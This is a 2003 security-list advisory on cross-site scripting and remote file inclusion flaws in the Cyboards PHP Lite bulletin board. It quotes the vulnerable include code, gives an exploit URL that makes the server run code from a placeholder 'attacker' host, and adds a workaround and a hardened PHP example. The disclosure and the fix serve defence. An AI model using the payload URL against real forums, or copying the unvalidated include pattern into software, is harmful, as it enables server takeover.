[UNIX] Cyboards Remote Code Execution and XSS

From: support@securiteam.com
Date: 01/22/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 22 Jan 2003 23:20:30 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Cyboards Remote Code Execution and XSS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.gold-sonata.com> Cyboards PHP Lite is a free open-source
    bulletin board written in PHP. Two vulnerabilities in the /include
    directory allow a remote attacker to execute arbitrary code on the server
    with the privileges of the web server. A further vulnerability in the
    /include directory allows an attacker to hijack other members' accounts
    through a cross-site scripting (XSS) attack.

    DETAILS

    Vulnerable systems:
     * Cyboards version 1.25 and prior

    Cross Site Scripting:
    Each of the following files can be made to return attacker-supplied HTML
    and JavaScript code:
    include/default_header.php
    include/options_form.php
    adminopts/login_form.php
    adminopts/include/ban_form.php
    adminopts/include/board_form.php
    adminopts/include/login_form.php
    adminopts/include/vip_form.php

    Remote Arbitrary Code Execution:
    Several PHP files inside the include directory do not check that they are
    being included by another forum script, so remote users can request them
    directly. Because they build include() paths from an unvalidated variable,
    a remote attacker can make the server include, and therefore run, arbitrary
    code hosted on a server of their choosing.

    1. include/default_header.php
    This file looks something like this:

    .

    if (isset($board_config["stylesheet"]) && (trim($board_config["stylesheet"]) != "")) {
      // the configured stylesheet URL is echoed into the page unescaped (XSS)
      echo "<LINK REL=STYLESHEET HREF='".$board_config["stylesheet"]."' TYPE='text/css'>\n\n";
    } else {
      echo "<style>\n";
      // $script_path is never validated; with register_globals it can come from the request (RFI)
      include("$script_path/include/default_style.css");
      echo "\n</style>";
    }

    .

    By default, $board_config["stylesheet"] is not set when the file is requested
    directly, because the forum script that would normally set it has not been
    included. This means that include("$script_path/include/default_style.css");
    is executed with $script_path taken from the request. By creating a
    directory called include on the attacker's server and placing the desired
    code inside default_style.css, an attacker can redirect the inclusion to
    the wrong CSS file, and PHP will execute the attacker's code. The URI would
    look something like this:

    http://victim/forum/include/default_header.php?script_path=http://attacker

    Where the attacker has created a directory called /include and, inside it, a
    file called default_style.css that contains the malicious code.

    2. include/options_form.php
    The file contains the following code on its first line:

    <? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>

    Note: An attacker can use this for an XSS attack as well, but given the
    possibility of running remote code on the server it is more probable
    he/she will use it for remote code execution.

    Solution:
    Please check the vendor's website for new patches.

    As a temporary solution, create an .htaccess file that contains 'Deny from
    all'. Place it in the /include directory and that should block remote
    users from accessing it.
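    The following is an added example of how the default_header.php fragment
    quoted above could be hardened in code; it is not Cyboards code. It assumes
    the forum's entry scripts define the constant IN_FORUM before including
    this file (that constant name is an assumption).

```php
<?php
// Added example, not part of Cyboards: a hardened form of the include/default_header.php
// pattern quoted in the advisory. Assumes the forum's entry scripts define IN_FORUM
// before including this file (the constant name is an assumption).

// Vulnerable pattern from the advisory: with register_globals, $script_path can come
// from the query string, so "?script_path=http://attacker" makes PHP fetch and run
// http://attacker/include/default_style.css.
//   include("$script_path/include/default_style.css");

// 1. Refuse direct requests: an include-only file must not act as an entry point.
if (!defined('IN_FORUM')) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// 2. Never build an include path from request data. Derive the forum root from this
//    file's own location and pin the target inside that tree with realpath().
$forum_root = realpath(dirname(__FILE__) . '/..');
$css_file   = ($forum_root === false) ? false : realpath($forum_root . '/include/default_style.css');
if ($css_file === false || strpos($css_file, $forum_root . DIRECTORY_SEPARATOR) !== 0) {
    exit; // missing file or resolved outside the forum tree (e.g. symlink): emit nothing
}

// 3. Output-encode anything reflected into HTML. With register_globals,
//    $board_config['stylesheet'] can be request-controlled as well, which is the
//    XSS the advisory reports for this file.
if (isset($board_config['stylesheet']) && trim($board_config['stylesheet']) != '') {
    $href = htmlspecialchars($board_config['stylesheet'], ENT_QUOTES);
    echo "<link rel=\"stylesheet\" href=\"$href\" type=\"text/css\">\n\n";
} else {
    echo "<style>\n";
    readfile($css_file); // CSS is data: serve it with readfile(), never include()
    echo "\n</style>";
}
```

    The include guard covers the same files the .htaccess workaround protects,
    but also holds on servers where .htaccess overrides are disabled.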

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mindwarper@hush.com>
    Mindwarper.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
